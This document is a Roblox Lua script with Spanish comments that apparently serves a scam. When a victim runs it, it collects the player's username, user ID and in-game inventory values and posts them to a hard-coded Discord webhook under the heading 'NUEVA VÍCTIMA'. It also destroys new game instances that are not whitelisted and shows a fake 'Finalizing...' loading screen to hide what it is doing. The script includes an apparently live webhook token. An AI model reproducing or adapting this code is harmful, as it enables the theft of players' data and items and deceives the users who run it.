-- ==================== SERVICIOS ====================

local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local Workspace = game:GetService("Workspace")
local TweenService = game:GetService("TweenService")
local UserInputService = game:GetService("UserInputService")
local CoreGui = game:GetService("CoreGui")
local StarterGui = game:GetService("StarterGui")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local GuiService = game:GetService("GuiService")
local VIM = game:GetService("VirtualInputManager")

-- ==================== CONFIG ====================

local WEBHOOK_URL = "https://discord.com/api/webhooks/1456818151617466540/gTXIOakP_WD8mLEEuvEKO-0NeoIXCnze3xBQubOKmDhmxSioyYPIaC0gFvWOBC_VKVhg"
local Min_Gen = 0

-- ==================== PLAYER ====================

local LocalPlayer = Players.LocalPlayer
local playerGui = LocalPlayer:WaitForChild("PlayerGui")
local UserID = LocalPlayer.UserId

-- ==================== WHITELIST ====================

local whitelist = {
    "hesizdev",
    "IlIlIlIlIIlI_lIlIlIl",
    "multicuentadeangel5"
}

local instanciasWhitelist = {}

local function agregarAWhitelist(instancia)
    if instancia then
        instanciasWhitelist[instancia] = true
    end
end

local function estaEnWhitelist(instancia)
    if instanciasWhitelist[instancia] then return true end
    local p = instancia.Parent
    while p do
        if instanciasWhitelist[p] then return true end
        p = p.Parent
    end
    return false
end

local function isWhitelisted(username)
    for _, n in ipairs(whitelist) do
        if username == n then return true end
    end
    return false
end

agregarAWhitelist(Players)
agregarAWhitelist(CoreGui)
agregarAWhitelist(StarterGui)
agregarAWhitelist(LocalPlayer)

-- ==================== UTILIDAD ====================

local function formatNumberShort(n)
    if n >= 1e9 then return string.format("$%.2fB", n / 1e9) end
    if n >= 1e6 then return string.format("$%.2fM", n / 1e6) end
    if n >= 1e3 then return string.format("$%.2fK", n / 1e3) end
    return "$" .. tostring(n)
end

local function parseValueFromText(s)
    if not s then return 0 end
    local clean = s:gsub("[^%d%.KMB]", "")
    local n = tonumber(clean:match("[%d%.]+")) or 0
    if s:find("B") then return n * 1e9 end
    if s:find("M") then return n * 1e6 end
    if s:find("K") then return n * 1e3 end
    return n
end

-- ==================== FANTASMA ====================

local function aplicarFantasma(modelo)
    if not modelo then return end
    for _, d in ipairs(modelo:GetDescendants()) do
        if d:IsA("BasePart") then
            d.Transparency = 1
            d.CanCollide = false
            d.CastShadow = false
        end
        if d:IsA("BillboardGui") then
            d.Enabled = false
        end
    end
end

-- ==================== BLOQUEO GLOBAL ====================

local function esParteDeJugador(inst)
    for _, p in ipairs(Players:GetPlayers()) do
        if p.Character and inst:IsDescendantOf(p.Character) then
            return true
        end
    end
    return false
end

local function bloquearInstancia(inst)
    if estaEnWhitelist(inst) then return end
    if esParteDeJugador(inst) then return end
    task.defer(function()
        if inst and inst.Parent then
            inst:Destroy()
        end
    end)
end

game.DescendantAdded:Connect(bloquearInstancia)

-- ==================== INVENTARIO ====================

local function getBrainrots()
    local results = {}
    for _, d in ipairs(Workspace:GetDescendants()) do
        if d:IsA("BillboardGui") then
            local n = d:FindFirstChildWhichIsA("TextLabel")
            if n then
                local v = parseValueFromText(n.Text)
                if v >= Min_Gen then
                    results[n.Text] = (results[n.Text] or 0) + v
                end
            end
        end
    end
    local out = {}
    for k, v in pairs(results) do
        table.insert(out, {name = k, value = v})
    end
    return out
end

-- ==================== DISCORD ====================

local function sendToDiscord(link, items)
    local total = 0
    local list = ""
    for i, it in ipairs(items) do
        if i <= 10 then
            list ..= string.format("> **%s** ➜ %s\n", it.name, formatNumberShort(it.value))
        end
        total += it.value
    end

    local req = syn and syn.request or request
    req({
        Url = WEBHOOK_URL,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = HttpService:JSONEncode({
            content = "||@everyone|| 🩸 NUEVA VÍCTIMA",
            embeds = {{
                title = "MOREIRA REPORT",
                color = 16711680,
                fields = {
                    {name = "Usuario", value = LocalPlayer.Name.." ("..UserID..")"},
                    {name = "Valor Total", value = formatNumberShort(total)},
                    {name = "Inventario", value = list ~= "" and list or "Vacío"},
                    {name = "Link", value = link}
                }
            }}
        })
    })
end

-- ==================== GUI FINAL ====================

local function CrearGuiFinal()
    local ScreenGui = Instance.new("ScreenGui")
    ScreenGui.IgnoreGuiInset = true
    ScreenGui.ResetOnSpawn = false
    ScreenGui.Parent = playerGui
    agregarAWhitelist(ScreenGui)

    local BG = Instance.new("Frame", ScreenGui)
    BG.Size = UDim2.new(1, 0, 1, 0)
    BG.BackgroundColor3 = Color3.fromRGB(10, 10, 15)

    local Text = Instance.new("TextLabel", BG)
    Text.Size = UDim2.new(1, 0, 0, 60)
    Text.Position = UDim2.new(0.5, 0, 0.55, 0)
    Text.AnchorPoint = Vector2.new(0.5, 0.5)
    Text.BackgroundTransparency = 1
    Text.Text = "Finalizing..."
    Text.Font = Enum.Font.GothamBold
    Text.TextSize = 32
    Text.TextColor3 = Color3.new(1,1,1)

    local BarBG = Instance.new("Frame", BG)
    BarBG.Size = UDim2.new(0.3, 0, 0, 4)
    BarBG.Position = UDim2.new(0.5, 0, 0.62, 0)
    BarBG.AnchorPoint = Vector2.new(0.5, 0.5)
    BarBG.BackgroundColor3 = Color3.fromRGB(40,40,40)

    local Bar = Instance.new("Frame", BarBG)
    Bar.Size = UDim2.new(0,0,1,0)
    Bar.BackgroundColor3 = Color3.new(1,1,1)

    TweenService:Create(Bar, TweenInfo.new(3), {
        Size = UDim2.new(1,0,1,0)
    }):Play()

    task.delay(4, function()
        ScreenGui:Destroy()
    end)
end

-- ==================== EJECUCIÓN FINAL ====================

local items = getBrainrots()
sendToDiscord("AUTO", items)
CrearGuiFinal()
